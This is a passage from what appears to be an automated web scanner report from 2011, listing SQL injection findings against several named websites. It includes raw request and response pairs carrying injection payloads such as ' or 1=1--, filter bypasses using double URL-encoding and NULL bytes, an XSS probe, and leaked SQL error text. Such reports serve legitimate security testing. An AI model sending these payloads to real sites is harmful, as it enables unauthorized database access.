GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/members/forgot-password&s=ysv9sd684163c3y40656182'%20or%201%3d1--%20&l=www.theamericanmonk.com/members/forgot-password&ti=Members%20-%20Forgot%20Password%20-%20The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 00:56:54 GMT
Connection: Keep-Alive
Set-Cookie: sess_=ysv9sd684163c3y40656182%27+or+1%3D1--+; path=/
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 225

_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617896;' + _mr_ex + ';' + 'path=/';_mrd.cookie='contact_id=51;' + _mr_ex + ';' + 'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

Request 2

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/members/forgot-password&s=ysv9sd684163c3y40656182'%20or%201%3d2--%20&l=www.theamericanmonk.com/members/forgot-password&ti=Members%20-%20Forgot%20Password%20-%20The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 00:57:34 GMT
Connection: Keep-Alive
Set-Cookie: sess_=ysv9sd684163c3y40656182%27+or+1%3D2--+; path=/
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 168

_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617910;' + _mr_ex + ';' + 'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

1.7. http://tracking.moon-ray.com/track.php [sess_ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The sess_ cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sess_ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_7&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y'%20and%201%3d1--%20; mr_src=mr_7

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:02:31 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 236

_mrd.cookie='sess_=ysv9sd684163c3y' and 1=1-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie = 't_=mr_7;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

Request 2

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_7&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y'%20and%201%3d2--%20; mr_src=mr_7

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:02:33 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 293

_mrd.cookie='sess_=ysv9sd684163c3y' and 1=2-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618145;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_7;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

1.8. http://tracking.moon-ray.com/track.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The t parameter appears to be vulnerable to SQL injection attacks. The payloads 24581160'%20or%201%3d1--%20 and 24581160'%20or%201%3d2--%20 were each submitted in the t parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_724581160'%20or%201%3d1--%20&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y; mr_src=mr_7

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:00:40 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_724581160%27+or+1%3D1--+; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 305

_mrd.cookie='ref_=mr_724581160' or 1=1-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618018;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 'own_=1;' + _mr_ex + ';'+'path=/';_mrd.cookie = 't_=mr_724581160' or 1=1-- ;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

Request 2

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_724581160'%20or%201%3d2--%20&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y; mr_src=mr_7

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:00:43 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_724581160%27+or+1%3D2--+; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 256

_mrd.cookie='ref_=mr_724581160' or 1=2-- ;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206618020;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_724581160' or 1=2-- ;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

1.9. http://www.acamnet.org/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.acamnet.org
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:52 GMT
Connection: close

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 19 Jun 2009 07:15:24 GMT
Accept-Ranges: bytes
ETag: "534b5b7adf0c91:22d2d"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:52 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

1.10. http://www.acamnet.org/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.acamnet.org
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:51 GMT
Connection: close

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3%2527%2527
Host: www.acamnet.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 200 OK
Content-Length: 894
Content-Type: image/x-icon
Last-Modified: Fri, 19 Jun 2009 07:15:24 GMT
Accept-Ranges: bytes
ETag: "534b5b7adf0c91:22d2d"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA POL"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:04:51 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

1.11. http://www.beam.to/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beam.to
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.beam.to
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:14:59 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /?1''=1 HTTP/1.1
Host: www.beam.to
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:00 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.12. http://www.beam.to/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beam.to
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:30 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:31 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.13. http://www.beam.to/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.beam.to
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:19 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>Internal Error</TITLE></HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#0000FF" VLINK="#0000FF">
<H1>Error in /cgi/beam2.exe</H1>
<PRE>ODBC-Aufruf fehlgeschlagen. Error Numbe
...[SNIP]...

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.beam.to
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:12:20 GMT
Connection: close
Content-type: text/html

<HTML><HEAD><TITLE>BEAMTO</TITLE>
<meta http-equiv="Refresh"content="0; URL=http://beam.to/index.asp">
</HEAD><BODY>
</BODY></HTML>

1.14. http://www.bustthebillstack.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bustthebillstack.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /favicon.ico%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bustthebillstack.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1220
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.bustthebillstack.com; path=/; expires=Thu, 05-May-2011 01:25:54 GMT
Connection: Keep-Alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<!-- turing_cluster_prod -->
<html>
<head>
<title>bustthebillstack.com</title>
<meta nam
...[SNIP]...

Request 2

GET /favicon.ico%2527%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bustthebillstack.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Wed, 04 May 2011 01:25:54 GMT
X-Varnish: 2330089581
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd01.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

1.15. http://www.findcoinprices.info/favicon.ico [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.findcoinprices.info
Path:   /favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3'
Host: www.findcoinprices.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Wed, 04 May 2011 01:05:53 GMT
X-Varnish: 2329927433
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd01.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
<h1>Error 417 Expectation Failed</h1>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3''
Host: www.findcoinprices.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 302 (Found)
Location: http://spi.domainsponsor.com/skins/favicon/mi_favicon.ico
Server: Oversee Turing v1.0.0
Content-Length: 32
Content-Type: text/html

<html><body><br></body></html>

1.16. http://www.henryfields.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.henryfields.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 65020305'%20or%201%3d1--%20 and 65020305'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico65020305'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.henryfields.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1 (redirected)

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 02:53:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://henryfields.com/default.asp?sid=0610789
Content-Length: 167
Content-Type: text/html
Expires: Wed, 04 May 2011 02:53:14 GMT
Set-Cookie: ASPSESSIONIDCCRQCDTC=HNIBAJNDHIBKPNHHJECHJMMH; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://henryfields.com/default.asp?sid=0610789">here</a>.</body>

Request 2

GET /favicon.ico65020305'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.henryfields.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2 (redirected)

HTTP/1.1 302 Object moved
Date: Wed, 04 May 2011 02:53:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://henryfields.com/default.asp?
Content-Length: 156
Content-Type: text/html
Expires: Wed, 04 May 2011 02:53:16 GMT
Set-Cookie: ASPSESSIONIDCCRQCDTC=JNIBAJNDNHDCFIICOHKCOGEF; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://henryfields.com/default.asp?">here</a>.</body>

1.17. http://www.mybusinesslisting.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 18080215'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico18080215'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 462
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=MFGAHBODGOKKPLIPNCODDNAI; path=/
Cache-control: private

Error Occured:<BR><BR>Error # -2147217900 Unclosed quotation mark before the character string ''.<BR>SQL = Select _tbl_Listings.*, _tbl_Categories.txtName as txtCategory,_tbl_Categories.txtTitle as tx
...[SNIP]...

1.18. http://www.mybusinesslisting.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=%00'

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 148
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=DFGAHBODHBCNAIGHCHANCAMC; path=/
Cache-control: private

Error Occured:<BR><BR>Error # -2147217900 Unclosed quotation mark before the character string ''.<BR>SQL = Select * from _tbl_Tags where txtName = '

1.19. http://www.mybusinesslisting.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 20620409'%20or%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico?120620409'%20or%201%3d1--%20=1 HTTP/1.1
